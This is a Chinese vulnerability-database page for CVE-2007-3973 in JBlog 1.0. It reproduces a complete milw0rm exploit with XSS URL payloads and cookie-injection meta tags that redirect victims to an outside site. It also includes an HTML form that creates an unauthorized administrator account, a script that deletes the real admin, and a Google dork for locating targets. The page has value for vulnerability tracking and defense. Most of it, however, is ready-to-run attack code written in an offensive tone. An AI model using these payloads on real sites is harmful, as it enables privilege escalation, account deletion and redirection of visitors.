JBlog 多个输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113340 漏洞类型 跨站脚本
发布时间 2007-07-21 更新时间 2007-07-26
CVE编号 CVE-2007-3973 CNNVD-ID CNNVD-200707-460
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/4211
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-460
|漏洞详情
JBlog1.0版本中存在多个跨站脚本攻击漏洞。远程攻击者可以借助(1)对(a)index.php的id参数或(2)搜索参数或(3)对(b)recherche.php的themecookie,注入任意web脚本或HTML。
|漏洞EXP
<!--
##############################################################################
#	Script...............: JBlog version: 1.0                            #
#	Script Site..........: http://www.jmuller.net/jblog                  #
#	Vulnerability........: Creat Admin exploit, xss, Cookie Manipulation #
#	Access...............: Remote                                        #
#	level................: Dangerous                                     #
#	Author...............: S4mi                                          #
#	Contact..............: S4mi[at]LinuxMail.org                         #
#                                                                            #
##############################################################################

cookies Manipulation + Cross Site Scripting :
=========================================================================
xss:
----
http://site.com/jblog/index.php?id=">[xss Here]&pcomm=com 

cookies Manipulation:
--------------------
The POST variable 'search' in  /jblog/recherche.php  also The Cookie variable 'theme' is affected and can be set to :

 <meta http-equiv='Set-cookie' content='name=value'>

also we can do this :

 <meta http-equiv='Set-cookie' content='theme=<body+onload=alert("owned_by_Hacker")>'>

or :

<meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://Bad.site.com/">'>

This is a small exemple of Inject Cookie Xploit (Cookie Manipulation)
---------------------------------------------------------------------------
<html>
<head>
<title>Inject Cookie Xploit By S4mi</title>
</head>
<body>
<script language="JavaScript">
function JBlogxpl() 
{
  document.xploit.action=document.xploit.victim.value;
  document.xploit.submit();
 }
</script>
<form name="xploit"  method="post" action="">
<input type="hidden" name="victim" value="http://victim/jblog/recherche.php">
<input type="hidden"  name="search" value="<meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://milw0rm.com/">'>" />
<script>document.location="javascript: JBlogxpl()"</script>
</form>
</body>
</html>

============================================================================

Remote Privilege Escalation "Creat New Admin Xploit" By S4mi : 
============================================================================
-->

<html>
<title>JBlog 1.0 -- Remote Privilege Escalation (Creat admin sploit) -- By S4mi</title>
<body>
<script language="JavaScript">
function JBlogxpl() {
  if (document.xploit.victim.value=="") {
    alert("Please enter target!");
    return false;
  }
 {
    xploit.action="http://"+document.xploit.victim.value+"admin/ajoutaut.php";
    xploit.mot.value=document.xploit.mot.value;
    xploit.droit.value=document.xploit.droit.value;
    xploit.submit();
  }
}

</script>
<strong><p>
-------------------------------------------------------------------------------------------<br>
  #JBlog 1.0 -- Remote Privilege Escalation Xploit (add user)<br>
  #	Discovered By...............: S4mi                                          <br>
  #	Contact..........................: S4mi[at]LinuxMail.org<br>
  #<br>
  #     Google Dork : "propulsé par JBlog"  <br>
  --------------------------------------------------------------------------------------------</p>
<form name="xploit" method="POST" onSubmit="JBlogxpl();">
  Target -> Http://
    <input type="text" name="victim" value="www.Site.com/Path/" size="44">
  <p> Username.......->
    <input type="text" name="mot" value="ZaZ" size="30"> 
    (your password will be by default: <i>"admin"</i>)</p>
  <p> User type......->
            <select name="droit">
                    <option value="3">Admin</option>
                    <option value="2">Moderator</option>
                    <option value="1">Editor</option>
            </select>
  </p>
  <p>Submit...........->
    <input name="submit" type="submit" value="   Xploit it       ">
  </p>
</form>
<br>---------------------------------------------------------------------------------------<br>
  #NB : Remember do not  use a probably existing username (such as "admin"). <br>
  #If you want to Delete real admin account :D login into your New Created admin account & use this :<br>
--------------------------------------------------------------------------------------------<p>
<script language="JavaScript">

function AdminDelete()
{ if (document.xploit.victim.value=="") {
    alert("Please enter target!");
    return false;
  }
         if(confirm('Are you Sure!! want really DELETE user ?'))
	document.location.href="http://"+document.xploit.victim.value+"admin/supauteur.php?cat="+document.userdel.id.value;
}
</script>
<form name="userdel" method="POST" onSubmit="">
ID...............> <input type="text" name="id" value="1" size="3">
</form>
<a href="#" OnClick="AdminDelete()"/>Delete</a>

<br>-----------------------------------------------------------------------------------------------<br>
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39, Black-Code, Nuck3r... & all who know Me!

</body>
</html>

# milw0rm.com [2007-07-21]
|参考资料

来源:BID
名称:24991
链接:http://www.securityfocus.com/bid/24991
来源:BUGTRAQ
名称:20070720JBlog1.0CreatAdminexploit,xss,CookieManipulation
链接:http://www.securityfocus.com/archive/1/archive/1/474320/100/0/threaded
来源:MILW0RM
名称:4211
链接:http://www.milw0rm.com/exploits/4211
来源:OSVDB
名称:38558
链接:http://osvdb.org/38558
来源:OSVDB
名称:38557
链接:http://osvdb.org/38557
来源:XF
名称:jblog-recherche-xss(35556)
链接:http://xforce.iss.net/xforce/xfdb/35556
来源:XF
名称:jblog-index-xss(35551)
链接:http://xforce.iss.net/xforce/xfdb/35551
来源:VUPEN
名称:ADV-2007-2611
链接:http://www.frsirt.com/english/advisories/2007/2611
来源:SREASON
名称:2919
链接:http://securityreason.com/securityalert/2919
来源:SECUNIA
名称:26165
链接:http://secunia.com/advisories/26165